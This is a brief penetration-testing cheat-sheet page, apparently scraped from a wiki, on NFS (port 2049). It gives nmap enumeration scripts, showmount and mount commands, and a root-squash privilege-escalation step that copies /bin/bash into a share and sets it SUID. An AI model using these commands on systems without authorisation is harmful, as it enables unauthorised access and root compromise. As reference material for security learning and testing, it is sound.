NFS - 2049
NFS Nedir?
Recon
nmap -p 2049 --script=nfs-ls,nfs-showmount,nfs-statfs <IP>Mounting
showmount -e 192.168.1.2
mkdir /tmp/mount
mount -t nfs 192.168.1.2:/remote_folder /tmp/mount -o nolockRoot Squash
cp /bin/bash /tmp/mount/<FOLDER>
chmod +s bashLast updated